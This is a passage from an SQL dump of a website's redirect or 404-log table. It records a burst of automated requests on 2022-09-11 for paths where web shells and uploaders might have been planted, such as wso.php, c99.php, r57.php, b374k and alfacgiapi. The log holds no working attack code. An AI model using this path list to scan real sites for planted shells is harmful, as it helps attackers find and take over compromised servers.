00:00:00',301),(38124,'https://malehus.in.ua/wp-content/plugins/owfsmac/mar.php',NULL,'','',1,0,'2022-09-11 05:09:06','0000-00-00 00:00:00',301),(38125,'https://malehus.in.ua/utchiha-setnryjr.php',NULL,'','',1,0,'2022-09-11 05:09:07','0000-00-00 00:00:00',301),(38126,'https://malehus.in.ua/owqwovcs.php',NULL,'','',1,0,'2022-09-11 05:09:08','0000-00-00 00:00:00',301),(38127,'https://malehus.in.ua/wpse.php',NULL,'','',1,0,'2022-09-11 05:09:09','0000-00-00 00:00:00',301),(38128,'https://malehus.in.ua/wp-content/uploads/simple-file-list/shell.php',NULL,'','',1,0,'2022-09-11 05:09:10','0000-00-00 00:00:00',301),(38129,'https://malehus.in.ua/images/king.php',NULL,'','',1,0,'2022-09-11 05:09:11','0000-00-00 00:00:00',301),(38130,'https://malehus.in.ua/wp-content/plugins/google-sitemap-generator/sitemap-core.php',NULL,'','',1,0,'2022-09-11 05:09:12','0000-00-00 00:00:00',301),(38131,'https://malehus.in.ua/wp-content/uploads/cndvwplyla.php',NULL,'','',1,0,'2022-09-11 05:09:13','0000-00-00 00:00:00',301),(38132,'https://malehus.in.ua/pi.php',NULL,'','',1,0,'2022-09-11 05:09:14','0000-00-00 00:00:00',301),(38133,'https://malehus.in.ua/wp-content/plugins/config.php',NULL,'','',1,0,'2022-09-11 05:09:17','0000-00-00 00:00:00',301),(38134,'https://malehus.in.ua/rg3v6.php',NULL,'','',1,0,'2022-09-11 05:09:20','0000-00-00 00:00:00',301),(38135,'https://malehus.in.ua/inc.class.wp-plugins.php',NULL,'','',1,0,'2022-09-11 05:09:24','0000-00-00 00:00:00',301),(38136,'https://malehus.in.ua/whmcs/downloads/dz.php',NULL,'','',1,0,'2022-09-11 05:09:27','0000-00-00 00:00:00',301),(38137,'https://malehus.in.ua/wp-includes/css/hr2rw4.php',NULL,'','',1,0,'2022-09-11 05:09:29','0000-00-00 00:00:00',301),(38138,'https://malehus.in.ua/wp-admin/includes/utchiha-nlhlwhd.php',NULL,'','',1,0,'2022-09-11 05:09:30','0000-00-00 00:00:00',301),(38139,'https://malehus.in.ua/wp-content/uploads/simple-file-list/fox.php',NULL,'','',1,0,'2022-09-11 05:09:31','0000-00-00 00:00:00',301),(38140,'https://malehus.in.ua/pop.php',NULL,'','',1,0,'2022-09-11 05:09:33','0000-00-00 00:00:00',301),(38141,'https://malehus.in.ua/utchiha-yzlin.php',NULL,'','',1,0,'2022-09-11 05:09:33','0000-00-00 00:00:00',301),(38142,'https://malehus.in.ua/cw.php',NULL,'','',1,0,'2022-09-11 05:09:35','0000-00-00 00:00:00',301),(38143,'https://malehus.in.ua/tmp/l3b.php',NULL,'','',1,0,'2022-09-11 05:09:36','0000-00-00 00:00:00',301),(38144,'https://malehus.in.ua/utchiha-olrlfavi.php',NULL,'','',1,0,'2022-09-11 05:09:37','0000-00-00 00:00:00',301),(38145,'https://malehus.in.ua/sxhc5a.php',NULL,'','',1,0,'2022-09-11 05:09:40','0000-00-00 00:00:00',301),(38146,'https://malehus.in.ua/logo/wp-2019.php',NULL,'','',1,0,'2022-09-11 05:09:41','0000-00-00 00:00:00',301),(38147,'https://malehus.in.ua/wp-admin/qunr7.php',NULL,'','',1,0,'2022-09-11 05:09:42','0000-00-00 00:00:00',301),(38148,'https://malehus.in.ua/wp-admin/css/colors/coffee/ups.php',NULL,'','',1,0,'2022-09-11 05:09:46','0000-00-00 00:00:00',301),(38149,'https://malehus.in.ua/wp-content/plugins/cakil/up.php',NULL,'','',1,0,'2022-09-11 05:09:48','0000-00-00 00:00:00',301),(38150,'https://malehus.in.ua/utchiha-dpta.php',NULL,'','',1,0,'2022-09-11 05:09:50','0000-00-00 00:00:00',301),(38151,'https://malehus.in.ua/wp-admin/maint/upl.php',NULL,'','',1,0,'2022-09-11 05:09:53','0000-00-00 00:00:00',301),(38152,'https://malehus.in.ua/mininew.php',NULL,'','',1,0,'2022-09-11 05:09:54','0000-00-00 00:00:00',301),(38153,'https://malehus.in.ua/wp-content/uploads/simple-file-list/dc.php',NULL,'','',1,0,'2022-09-11 05:09:55','0000-00-00 00:00:00',301),(38154,'https://malehus.in.ua/utchiha-fdf.php',NULL,'','',1,0,'2022-09-11 05:09:56','0000-00-00 00:00:00',301),(38155,'https://malehus.in.ua/utchiha-aqhsqhsf.php',NULL,'','',1,0,'2022-09-11 05:09:57','0000-00-00 00:00:00',301),(38156,'https://malehus.in.ua/tmp/cpn.php',NULL,'','',1,0,'2022-09-11 05:10:01','0000-00-00 00:00:00',301),(38157,'https://malehus.in.ua/fonts/ice.php',NULL,'','',1,0,'2022-09-11 05:10:01','0000-00-00 00:00:00',301),(38158,'https://malehus.in.ua/wp-admin/zat2.php',NULL,'','',1,0,'2022-09-11 05:10:03','0000-00-00 00:00:00',301),(38159,'https://malehus.in.ua/wp-content/upl.php',NULL,'','',1,0,'2022-09-11 05:10:06','0000-00-00 00:00:00',301),(38160,'https://malehus.in.ua/4t2uc8.php',NULL,'','',1,0,'2022-09-11 05:10:08','0000-00-00 00:00:00',301),(38161,'https://malehus.in.ua/utchiha-mrxjmoqw.php',NULL,'','',1,0,'2022-09-11 05:10:09','0000-00-00 00:00:00',301),(38162,'https://malehus.in.ua/main/1.php',NULL,'','',1,0,'2022-09-11 05:10:10','0000-00-00 00:00:00',301),(38163,'https://malehus.in.ua/utchiha-tnz.php',NULL,'','',1,0,'2022-09-11 05:10:11','0000-00-00 00:00:00',301),(38164,'https://malehus.in.ua/utchiha-gkk.php',NULL,'','',1,0,'2022-09-11 05:10:12','0000-00-00 00:00:00',301),(38165,'https://malehus.in.ua/wp-includes/css/f0x.php',NULL,'','',1,0,'2022-09-11 05:10:17','0000-00-00 00:00:00',301),(38166,'https://malehus.in.ua/wp-includes/sys.php',NULL,'','',1,0,'2022-09-11 05:10:18','0000-00-00 00:00:00',301),(38167,'https://malehus.in.ua/wp-content/lycesqtz.php',NULL,'','',1,0,'2022-09-11 05:10:18','0000-00-00 00:00:00',301),(38168,'https://malehus.in.ua/wp-includes/simplepie/content/type/heck.php',NULL,'','',1,0,'2022-09-11 05:10:20','0000-00-00 00:00:00',301),(38169,'https://malehus.in.ua/utchiha-upbmkzb.php',NULL,'','',1,0,'2022-09-11 05:10:21','0000-00-00 00:00:00',301),(38170,'https://malehus.in.ua/ex0shell.php',NULL,'','',1,0,'2022-09-11 05:10:22','0000-00-00 00:00:00',301),(38171,'https://malehus.in.ua/75888592_err0r.php',NULL,'','',1,0,'2022-09-11 05:10:25','0000-00-00 00:00:00',301),(38172,'https://malehus.in.ua/images/wso.php',NULL,'','',1,0,'2022-09-11 05:10:27','0000-00-00 00:00:00',301),(38173,'https://malehus.in.ua/wp-admin/css/up.php',NULL,'','',1,0,'2022-09-11 05:10:30','0000-00-00 00:00:00',301),(38174,'https://malehus.in.ua/tersembunyi.php',NULL,'','',1,0,'2022-09-11 05:10:32','0000-00-00 00:00:00',301),(38175,'https://malehus.in.ua/utchiha-fmn.php',NULL,'','',1,0,'2022-09-11 05:10:32','0000-00-00 00:00:00',301),(38176,'https://malehus.in.ua/wp-admin/langar.php',NULL,'','',1,0,'2022-09-11 05:10:34','0000-00-00 00:00:00',301),(38177,'https://malehus.in.ua/adminer.php',NULL,'','',3,0,'2022-09-11 05:10:36','0000-00-00 00:00:00',301),(38178,'https://malehus.in.ua/romfc.php',NULL,'','',1,0,'2022-09-11 05:10:38','0000-00-00 00:00:00',301),(38179,'https://malehus.in.ua/indeeex.php',NULL,'','',1,0,'2022-09-11 05:10:39','0000-00-00 00:00:00',301),(38180,'https://malehus.in.ua/wp-admin/ugeaz.php',NULL,'','',1,0,'2022-09-11 05:10:40','0000-00-00 00:00:00',301),(38181,'https://malehus.in.ua/q6y9f.php?fox=m1gyz',NULL,'','',1,0,'2022-09-11 05:10:42','0000-00-00 00:00:00',301),(38182,'https://malehus.in.ua/utchiha-hpofdob.php',NULL,'','',1,0,'2022-09-11 05:10:43','0000-00-00 00:00:00',301),(38183,'https://malehus.in.ua/nshell.php',NULL,'','',1,0,'2022-09-11 05:10:45','0000-00-00 00:00:00',301),(38184,'https://malehus.in.ua/wp-admin/includes/wso.php',NULL,'','',1,0,'2022-09-11 05:10:46','0000-00-00 00:00:00',301),(38185,'https://malehus.in.ua/alfa_data/alfacgiapi/r57.php',NULL,'','',1,0,'2022-09-11 05:10:47','0000-00-00 00:00:00',301),(38186,'https://malehus.in.ua/wp-content/plugins/cekidot/mr.php',NULL,'','',1,0,'2022-09-11 05:10:48','0000-00-00 00:00:00',301),(38187,'https://malehus.in.ua/wp-content/5.php',NULL,'','',1,0,'2022-09-11 05:10:49','0000-00-00 00:00:00',301),(38188,'https://malehus.in.ua/wp-admin/maint/wp-cron.php',NULL,'','',1,0,'2022-09-11 05:10:50','0000-00-00 00:00:00',301),(38189,'https://malehus.in.ua/hga3u2.php',NULL,'','',1,0,'2022-09-11 05:10:52','0000-00-00 00:00:00',301),(38190,'https://malehus.in.ua/unziperpoe.php',NULL,'','',1,0,'2022-09-11 05:10:54','0000-00-00 00:00:00',301),(38191,'https://malehus.in.ua/vekizcjxrc.php',NULL,'','',1,0,'2022-09-11 05:10:56','0000-00-00 00:00:00',301),(38192,'https://malehus.in.ua/1zw8hy.php',NULL,'','',1,0,'2022-09-11 05:10:57','0000-00-00 00:00:00',301),(38193,'https://malehus.in.ua/images/4pride.php',NULL,'','',1,0,'2022-09-11 05:10:58','0000-00-00 00:00:00',301),(38194,'https://malehus.in.ua/finca.php',NULL,'','',1,0,'2022-09-11 05:10:59','0000-00-00 00:00:00',301),(38195,'https://malehus.in.ua/1mvfnx.php',NULL,'','',1,0,'2022-09-11 05:11:00','0000-00-00 00:00:00',301),(38196,'https://malehus.in.ua/wp-admin/jensq.php',NULL,'','',1,0,'2022-09-11 05:11:02','0000-00-00 00:00:00',301),(38197,'https://malehus.in.ua/wp-content/mode.php',NULL,'','',1,0,'2022-09-11 05:11:03','0000-00-00 00:00:00',301),(38198,'https://malehus.in.ua/wp-admin/anonime-shell.php',NULL,'','',1,0,'2022-09-11 05:11:04','0000-00-00 00:00:00',301),(38199,'https://malehus.in.ua/inc.class.3index.php',NULL,'','',1,0,'2022-09-11 05:11:08','0000-00-00 00:00:00',301),(38200,'https://malehus.in.ua/syhrnvhpze.php',NULL,'','',1,0,'2022-09-11 05:11:10','0000-00-00 00:00:00',301),(38201,'https://malehus.in.ua/utchiha-geud.php',NULL,'','',1,0,'2022-09-11 05:11:11','0000-00-00 00:00:00',301),(38202,'https://malehus.in.ua/snd21.php',NULL,'','',1,0,'2022-09-11 05:11:12','0000-00-00 00:00:00',301),(38203,'https://malehus.in.ua/images/lux.php',NULL,'','',1,0,'2022-09-11 05:11:15','0000-00-00 00:00:00',301),(38204,'https://malehus.in.ua/wp-admin/css/colors/coffee/404.php',NULL,'','',1,0,'2022-09-11 05:11:16','0000-00-00 00:00:00',301),(38205,'https://malehus.in.ua/wp-admin/includes/gelay.php',NULL,'','',1,0,'2022-09-11 05:11:19','0000-00-00 00:00:00',301),(38206,'https://malehus.in.ua/tl.php',NULL,'','',1,0,'2022-09-11 05:11:23','0000-00-00 00:00:00',301),(38207,'https://malehus.in.ua/wp-content/zfox.php',NULL,'','',1,0,'2022-09-11 05:11:24','0000-00-00 00:00:00',301),(38208,'https://malehus.in.ua/user.php',NULL,'','',1,0,'2022-09-11 05:11:25','0000-00-00 00:00:00',301),(38209,'https://malehus.in.ua/wp-includes/simplepie/content/type/wso.php',NULL,'','',1,0,'2022-09-11 05:11:26','0000-00-00 00:00:00',301),(38210,'https://malehus.in.ua/alfa_data/wp-2019.php',NULL,'','',1,0,'2022-09-11 05:11:28','0000-00-00 00:00:00',301),(38211,'https://malehus.in.ua/q8tp53.php',NULL,'','',1,0,'2022-09-11 05:11:29','0000-00-00 00:00:00',301),(38212,'https://malehus.in.ua/wp-signup.php?fox=sqflz',NULL,'','',1,0,'2022-09-11 05:11:30','0000-00-00 00:00:00',301),(38213,'https://malehus.in.ua/wp-content/mini.php',NULL,'','',1,0,'2022-09-11 05:11:31','0000-00-00 00:00:00',301),(38214,'https://malehus.in.ua/wp-admin/maint/wso.php',NULL,'','',1,0,'2022-09-11 05:11:32','0000-00-00 00:00:00',301),(38215,'https://malehus.in.ua/wp-content/plugins/wp-diambar/includes/loadme.php',NULL,'','',1,0,'2022-09-11 05:11:33','0000-00-00 00:00:00',301),(38216,'https://malehus.in.ua/jv2vkr.php',NULL,'','',1,0,'2022-09-11 05:11:36','0000-00-00 00:00:00',301),(38217,'https://malehus.in.ua/h0110w4y.php',NULL,'','',1,0,'2022-09-11 05:11:38','0000-00-00 00:00:00',301),(38218,'https://malehus.in.ua/wp-admin/css/colors/coffee/xxx.php',NULL,'','',1,0,'2022-09-11 05:11:39','0000-00-00 00:00:00',301),(38219,'https://malehus.in.ua/wp-admin/nd8zi.php',NULL,'','',1,0,'2022-09-11 05:11:44','0000-00-00 00:00:00',301),(38220,'https://malehus.in.ua/jgtmjhhw.php',NULL,'','',1,0,'2022-09-11 05:11:45','0000-00-00 00:00:00',301),(38221,'https://malehus.in.ua/b374k-3.2.3.php',NULL,'','',1,0,'2022-09-11 05:11:47','0000-00-00 00:00:00',301),(38222,'https://malehus.in.ua/vse.php',NULL,'','',1,0,'2022-09-11 05:11:48','0000-00-00 00:00:00',301),(38223,'https://malehus.in.ua/w0.php',NULL,'','',1,0,'2022-09-11 05:11:49','0000-00-00 00:00:00',301),(38224,'https://malehus.in.ua/wp-content/ninja.php',NULL,'','',1,0,'2022-09-11 05:11:51','0000-00-00 00:00:00',301),(38225,'https://malehus.in.ua/alfa_data/alfacgiapi/fw.php',NULL,'','',1,0,'2022-09-11 05:11:52','0000-00-00 00:00:00',301),(38226,'https://malehus.in.ua/wp-admin/css/colors/coffee/mini.local.php',NULL,'','',1,0,'2022-09-11 05:11:55','0000-00-00 00:00:00',301),(38227,'https://malehus.in.ua/images/shell.php',NULL,'','',1,0,'2022-09-11 05:11:56','0000-00-00 00:00:00',301),(38228,'https://malehus.in.ua/9o71c6.php',NULL,'','',1,0,'2022-09-11 05:11:58','0000-00-00 00:00:00',301),(38229,'https://malehus.in.ua/wp-pluging.php',NULL,'','',1,0,'2022-09-11 05:11:59','0000-00-00 00:00:00',301),(38230,'https://malehus.in.ua/dha.php',NULL,'','',1,0,'2022-09-11 05:12:00','0000-00-00 00:00:00',301),(38231,'https://malehus.in.ua/utchiha-flyax.php',NULL,'','',1,0,'2022-09-11 05:12:01','0000-00-00 00:00:00',301),(38232,'https://malehus.in.ua/utchiha-vfw.php',NULL,'','',1,0,'2022-09-11 05:12:04','0000-00-00 00:00:00',301),(38233,'https://malehus.in.ua/wp_logx.php',NULL,'','',1,0,'2022-09-11 05:12:05','0000-00-00 00:00:00',301),(38234,'https://malehus.in.ua/foxwsov2.php',NULL,'','',1,0,'2022-09-11 05:12:05','0000-00-00 00:00:00',301),(38235,'https://malehus.in.ua/wp-admin/lkf65.php',NULL,'','',1,0,'2022-09-11 05:12:08','0000-00-00 00:00:00',301),(38236,'https://malehus.in.ua/n00bs3c.php',NULL,'','',1,0,'2022-09-11 05:12:10','0000-00-00 00:00:00',301),(38237,'https://malehus.in.ua/zzkwbhip.php',NULL,'','',1,0,'2022-09-11 05:12:12','0000-00-00 00:00:00',301),(38238,'https://malehus.in.ua/vesiw.php',NULL,'','',1,0,'2022-09-11 05:12:13','0000-00-00 00:00:00',301),(38239,'https://malehus.in.ua/up-kon.php',NULL,'','',1,0,'2022-09-11 05:12:15','0000-00-00 00:00:00',301),(38240,'https://malehus.in.ua/utchiha-dye.php',NULL,'','',1,0,'2022-09-11 05:12:18','0000-00-00 00:00:00',301),(38241,'https://malehus.in.ua/sysadmins/admin1/sniper.php',NULL,'','',1,0,'2022-09-11 05:12:19','0000-00-00 00:00:00',301),(38242,'https://malehus.in.ua/wp-admin/otm4n3x.php',NULL,'','',1,0,'2022-09-11 05:12:21','0000-00-00 00:00:00',301),(38243,'https://malehus.in.ua/wp-admin/sgr4u.php',NULL,'','',1,0,'2022-09-11 05:12:21','0000-00-00 00:00:00',301),(38244,'https://malehus.in.ua/shl.php',NULL,'','',1,0,'2022-09-11 05:12:22','0000-00-00 00:00:00',301),(38245,'https://malehus.in.ua/wp-content/plugins/aryabot/mari.php',NULL,'','',1,0,'2022-09-11 05:12:23','0000-00-00 00:00:00',301),(38246,'https://malehus.in.ua/wp-content/z.php',NULL,'','',1,0,'2022-09-11 05:12:26','0000-00-00 00:00:00',301),(38247,'https://malehus.in.ua/sts.php',NULL,'','',1,0,'2022-09-11 05:12:28','0000-00-00 00:00:00',301),(38248,'https://malehus.in.ua/images/mar.php',NULL,'','',1,0,'2022-09-11 05:12:29','0000-00-00 00:00:00',301),(38249,'https://malehus.in.ua/index8.php',NULL,'','',1,0,'2022-09-11 05:12:30','0000-00-00 00:00:00',301),(38250,'https://malehus.in.ua/wp-admin/css/colors/coffee/alfa.php',NULL,'','',1,0,'2022-09-11 05:12:31','0000-00-00 00:00:00',301),(38251,'https://malehus.in.ua/wp-admin/css/langar.php',NULL,'','',1,0,'2022-09-11 05:12:34','0000-00-00 00:00:00',301),(38252,'https://malehus.in.ua/utchiha-jdff.php',NULL,'','',1,0,'2022-09-11 05:12:35','0000-00-00 00:00:00',301),(38253,'https://malehus.in.ua/zat2.php',NULL,'','',1,0,'2022-09-11 05:12:36','0000-00-00 00:00:00',301),(38254,'https://malehus.in.ua/wp-admin/lx.php',NULL,'','',1,0,'2022-09-11 05:12:39','0000-00-00 00:00:00',301),(38255,'https://malehus.in.ua/wp-admin/l94n5.php',NULL,'','',1,0,'2022-09-11 05:12:40','0000-00-00 00:00:00',301),(38256,'https://malehus.in.ua/cjawy8kf7ci.php',NULL,'','',1,0,'2022-09-11 05:12:41','0000-00-00 00:00:00',301),(38257,'https://malehus.in.ua/wp-content/alfacgiapi/nf5c0n.php',NULL,'','',1,0,'2022-09-11 05:12:42','0000-00-00 00:00:00',301),(38258,'https://malehus.in.ua/lg075g.php',NULL,'','',1,0,'2022-09-11 05:12:45','0000-00-00 00:00:00',301),(38259,'https://malehus.in.ua/wp-content/plugins/ubh/con.php',NULL,'','',1,0,'2022-09-11 05:12:47','0000-00-00 00:00:00',301),(38260,'https://malehus.in.ua/utchiha-aalq.php',NULL,'','',1,0,'2022-09-11 05:12:48','0000-00-00 00:00:00',301),(38261,'https://malehus.in.ua/utchiha-odt.php',NULL,'','',1,0,'2022-09-11 05:12:49','0000-00-00 00:00:00',301),(38262,'https://malehus.in.ua/alfa_data/alfacgiapi/c99.php',NULL,'','',1,0,'2022-09-11 05:12:51','0000-00-00 00:00:00',301),(38263,'https://malehus.in.ua/wp-admin/jq8ob.php',NULL,'','',1,0,'2022-09-11 05:12:55','0000-00-00 00:00:00',301),(38264,'https://malehus.in.ua/phpinj.php',NULL,'','',1,0,'2022-09-11 05:12:57','0000-00-00 00:00:00',301),(38265,'https://malehus.in.ua/wp-content/plugins/zaen/includes/loadme.php',NULL,'','',1,0,'2022-09-11 05:12:59','0000-00-00 00:00:00',301),(38266,'https://malehus.in.ua/wp-content/alpa.php',NULL,'','',1,0,'2022-09-11 05:13:00','0000-00-00 00:00:00',301),(38267,'https://malehus.in.ua/wp-admin/css/colors/coffee/sh3ll.php',NULL,'','',1,0,'2022-09-11 05:13:01','0000-00-00 00:00:00',301),(38268,'https://malehus.in.ua/529.php',NULL,'','',1,0,'2022-09-11 05:13:03','0000-00-00 00:00:00',301),(38269,'https://malehus.in.ua/wp-comments-post.php',NULL,'','',1,0,'2022-09-11 05:13:04','0000-00-00 00:00:00',301),(38270,'https://malehus.in.ua/-.php',NULL,'','',1,0,'2022-09-11 05:13:07','0000-00-00 00:00:00',301),(38271,'https://malehus.in.ua/.alf.php',NULL,'','',1,0,'2022-09-11 05:13:08','0000-00-00 00:00:00',301),(38272,'https://malehus.in.ua/utchiha-ejjkmu.php',NULL,'','',1,0,'2022-09-11 05:13:09','0000-00-00 00:00:00',301),(38273,'https://malehus.in.ua/main/wso.php',NULL,'','',1,0,'2022-09-11 05:13:10','0000-00-00 00:00:00',301),(38274,'https://malehus.in.ua/s46v1.php',NULL,'','',1,0,'2022-09-11 05:13:12','0000-00-00 00:00:00',301),(38275,'https://malehus.in.ua/wp-includes/css/j9tv8d.php',NULL,'','',1,0,'2022-09-11 05:13:13','0000-00-00 00:00:00',301),(38276,'https://malehus.in.ua/wp-content/kk.php',NULL,'','',1,0,'2022-09-11 05:13:15','0000-00-00 00:00:00',301),(38277,'https://malehus.in.ua/wp-content/plugins/upspy/con.php',NULL,'','',2,0,'2022-09-11 05:13:17','0000-00-00 00:00:00',301),(38278,'https://malehus.in.ua/wp-admin/css/colors/ectoplasm/uwer.php',NULL,'','',1,0,'2022-09-11 05:13:19','0000-00-00 00:00:00',301),(38279,'https://malehus.in.ua/3j17ae.php',NULL,'','',1,0,'2022-09-11 05:13:21','0000-00-00 00:00:00',301),(38280,'https://malehus.in.ua/utchiha-snlhba.php',NULL,'','',1,0,'2022-09-11 05:13:22','0000-00-00 00:00:00',301),(38281,'https://malehus.in.ua/ot.php',NULL,'','',1,0,'2022-09-11 05:13:22','0000-00-00 00:00:00',301),(38282,'https://malehus.in.ua/ys16l.php',NULL,'','',1,0,'2022-09-11 05:13:23','0000-00-00 00:00:00',301),(38283,'https://malehus.in.ua/wp-admin/css/colors/coffee/black.php',NULL,'','',1,0,'2022-09-11 05:13:24','0000-00-00 00:00:00',301),(38284,'https://malehus.in.ua/init.php',NULL,'','',1,0,'2022-09-11 05:13:25','0000-00-00 00:00:00',301),(38285,'https://malehus.in.ua/lolol.php',NULL,'','',1,0,'2022-09-11 05:13:26','0000-00-00 00:00:00',301),(38286,'https://malehus.in.ua/ra,due,ayang.php',NULL,'','',1,0,'2022-09-11 05:13:27','0000-00-00 00:00:00',301),(38287,'https://malehus.in.ua/administration/wso.php',NULL,'','',1,0,'2022-09-11 05:13:28','0000-00-00 00:00:00',301),(38288,'https://malehus.in.ua/shadowx.php',NULL,'','',1,0,'2022-09-11 05:13:31','0000-00-00 00:00:00',301),(38289,'https://malehus.in.ua/wp-admin/ycxlu.php',NULL,'','',1,0,'2022-09-11 05:13:32','0000-00-00 00:00:00',301),(38290,'https://malehus.in.ua/bitwise.php',NULL,'','',1,0,'2022-09-11 05:13:36','0000-00-00 00:00:00',301),(38291,'https://malehus.in.ua/wp-content/plugins/three-column-screen-layout/db.php',NULL,'','',1,0,'2022-09-11 05:13:38','0000-00-00 00:00:00',301),(38292,'https://malehus.in.ua/.cgi/cache/wso.php',NULL,'','',1,0,'2022-09-11 05:13:39','0000-00-00 00:00:00',301),(38293,'https://malehus.in.ua/wp-includes/wp-mopzem.php',NULL,'','',1,0,'2022-09-11 05:13:40','0000-00-00 00:00:00',301),(38294,'https://malehus.in.ua/rbiumvgl.php',NULL,'','',1,0,'2022-09-11 05:13:41','0000-00-00 00:00:00',301),(38295,'https://malehus.in.ua/wp-admin/maint/am.php',NULL,'','',1,0,'2022-09-11 05:13:43','0000-00-00 00:00:00',301),(38296,'https://malehus.in.ua/egyshell.php',NULL,'','',1,0,'2022-09-11 05:13:44','0000-00-00 00:00:00',301),(38297,'https://malehus.in.ua/3x.php',NULL,'','',1,0,'2022-09-11 05:13:45','0000-00-00 00:00:00',301),(38298,'https://malehus.in.ua/wp-content/mny4z.php',NULL,'','',1,0,'2022-09-11 05:13:46','0000-00-00 00:00:00',301),(38299,'https://malehus.in.ua/1877x.php',NULL,'','',1,0,'2022-09-11 05:13:47','0000-00-00 00:00:00',301),(38300,'https://malehus.in.ua/sk27rsm.php',NULL,'','',1,0,'2022-09-11 05:13:49','0000-00-00 00:00:00',301),(38301,'https://malehus.in.ua/pl1gn.php',NULL,'','',1,0,'2022-09-11 05:13:50','0000-00-00 00:00:00',301),(38302,'https://malehus.in.ua/tmp.php',NULL,'','',1,0,'2022-09-11 05:13:50','0000-00-00 00:00:00',301),(38303,'https://malehus.in.ua/wp-includes/f0x.php',NULL,'','',1,0,'2022-09-11 05:13:52','0000-00-00 00:00:00',301),(38304,'https://malehus.in.ua/wp-admin/maint/gelay.php',NULL,'','',1,0,'2022-09-11 05:13:57','0000-00-00 00:00:00',301),(38305,'https://malehus.in.ua/wp-admin/css/about.php',NULL,'','',1,0,'2022-09-11 05:13:59','0000-00-00 00:00:00',301),(38306,'https://malehus.in.ua/zerobyte.php',NULL,'','',1,0,'2022-09-11 05:14:00','0000-00-00 00:00:00',301),(38307,'https://malehus.in.ua/wp-content/finca.php',NULL,'','',1,0,'2022-09-11 05:14:01','0000-00-00 00:00:00',301),(38308,'https://malehus.in.ua/utchiha-xyd.php',NULL,'','',1,0,'2022-09-11 05:14:02','0000-00-00 00:00:00',301),(38309,'https://malehus.in.ua/cyb3r-sh3ll.php',NULL,'','',1,0,'2022-09-11 05:14:05','0000-00-00 00:00:00',301),(38310,'https://malehus.in.ua/.cgi/cache/up.php',NULL,'','',1,0,'2022-09-11 05:14:06','0000-00-00 00:00:00',301),(38311,'https://malehus.in.ua/yhr.php',NULL,'','',1,0,'2022-09-11 05:14:07','0000-00-00 00:00:00',301),(38312,'https://malehus.in.ua/utchiha-fjicdxgt.php',NULL,'','',1,0,'2022-09-11 05:14:08','0000-00-00 00:00:00',301),(38313,'https://malehus.in.ua/webr00t.php',NULL,'','',1,0,'2022-09-11 05:14:11','0000-00-00 00:00:00',301),(38314,'https://malehus.in.ua/indosec.php',NULL,'','',1,0,'2022-09-11 05:14:12','0000-00-00 00:00:00',301),(38315,'https://malehus.in.ua/foxs1sx.php',NULL,'','',1,0,'2022-09-11 05:14:13','0000-00-00 00:00:00',301),(38316,'https://malehus.in.ua/utchiha-zshpfw.php',NULL,'','',1,0,'2022-09-11 05:14:14','0000-00-00 00:00:00',301),(38317,'https://malehus.in.ua/wp-includes/simplepie/content/type/fucked.php',NULL,'','',1,0,'2022-09-11 05:14:15','0000-00-00 00:00:00',301),(38318,'https://malehus.in.ua/wp-content/ice.php',NULL,'','',1,0,'2022-09-11 05:14:16','0000-00-00 00:00:00',301),(38319,'https://malehus.in.ua/wp-content/ave.php',NULL,'','',1,0,'2022-09-11 05:14:17','0000-00-00 00:00:00',301),(38320,'https://malehus.in.ua/utchiha-cmiodwt.php',NULL,'','',1,0,'2022-09-11 05:14:19','0000-00-00 00:00:00',301),(38321,'https://malehus.in.ua/wp.plug.php',NULL,'','',1,0,'2022-09-11 05:14:20','0000-00-00 00:00:00',301),(38322,'https://malehus.in.ua/system_log.php',NULL,'','',6,0,'2022-09-11 05:14:23','0000-00-00 00:00:00',301),(38323,'https://malehus.in.ua/zcanp.php',NULL,'','',1,0,'2022-09-11 05:14:26','0000-00-00 00:00:00',301),(38324,'https://malehus.in.ua/c9ny3.php',NULL,'','',1,0,'2022-09-11 05:14:29','0000-00-00 00:00:00',301),(38325,'https://malehus.in.ua/utchiha-peo.php',NULL,'','',1,0,'2022-09-11 05:14:30','0000-00-00 00:00:00',301),(38326,'https://malehus.in.ua/utchiha-bqzeg.php',NULL,'','',1,0,'2022-09-11 05:14:30','0000-00-00 00:00:00',301),(38327,'https://malehus.in.ua/utchiha-hrbeqmno.php',NULL,'','',1,0,'2022-09-11 05:14:31','0000-00-00 00:00:00',301),(38328,'https://malehus.in.ua/wp-admin/mdsa9.php',NULL,'','',1,0,'2022-09-11 05:14:32','0000-00-00 00:00:00',301),(38329,'https://malehus.in.ua/zacosmall.php',NULL,'','',1,0,'2022-09-11 05:14:33','0000-00-00 00:00:00',301),(38330,'https://malehus.in.ua/lx.php',NULL,'','',1,0,'2022-09-11 05:14:35','0000-00-00 00:00:00',301),(38331,'https://malehus.in.ua/wp-admin/ci3rl.php',NULL,'','',1,0,'2022-09-11 05:14:36','0000-00-00 00:00:00',301),(38332,'https://malehus.in.ua/wp-content/uploads/simple-file-list/alfa.php',NULL,'','',1,0,'2022-09-11 05:14:37','0000-00-00 00:00:00',301),(38333,'https://malehus.in.ua/twins.php',NULL,'','',1,0,'2022-09-11 05:14:40','0000-00-00 00:00:00',301),(38334,'https://malehus.in.ua/wp-content/plugins/aryabot/wawe.php',NULL,'','',1,0,'2022-09-11 05:14:41','0000-00-00 00:00:00',301),(38335,'https://malehus.in.ua/wp-content/plugins/wp-db-ajax-made/wp-ajax.php',NULL,'','',1,0,'2022-09-11 05:14:42','0000-00-00 00:00:00',301),(38336,'https://malehus.in.ua/.cgi/cache/fw.php',NULL,'','',1,0,'2022-09-11 05:14:44','0000-00-00 00:00:00',301),(38337,'https://malehus.in.ua/wp-content/xx.php',NULL,'','',1,0,'2022-09-11 05:14:46','0000-00-00 00:00:00',301),(38338,'https://malehus.in.ua/mzcxghsk.php',NULL,'','',1,0,'2022-09-11 05:14:47','0000-00-00 00:00:00',301),(38339,'https://malehus.in.ua/control.php',NULL,'','',1,0,'2022-09-11 05:14:48','0000-00-00 00:00:00',301),(38340,'https://malehus.in.ua/xlcmsvlbqo.php',NULL,'','',1,0,'2022-09-11 05:14:49','0000-00-00 00:00:00',301),(38341,'https://malehus.in.ua/wp-admin/includes/mar.php',NULL,'','',1,0,'2022-09-11 05:14:49','0000-00-00 00:00:00',301),(38342,'https://malehus.in.ua/wp-0.php',NULL,'','',1,0,'2022-09-11 05:14:51','0000-00-00 00:00:00',301),(38343,'https://malehus.in.ua/wp-admin/css/colors/coffee/1.php',NULL,'','',1,0,'2022-09-11 05:14:54','0000-00-00 00:00:00',301),(38344,'https://malehus.in.ua/soz.php',NULL,'','',1,0,'2022-09-11 05:14:55','0000-00-00 00:00:00',301),(38345,'https://malehus.in.ua/0t0gch.php',NULL,'','',1,0,'2022-09-11 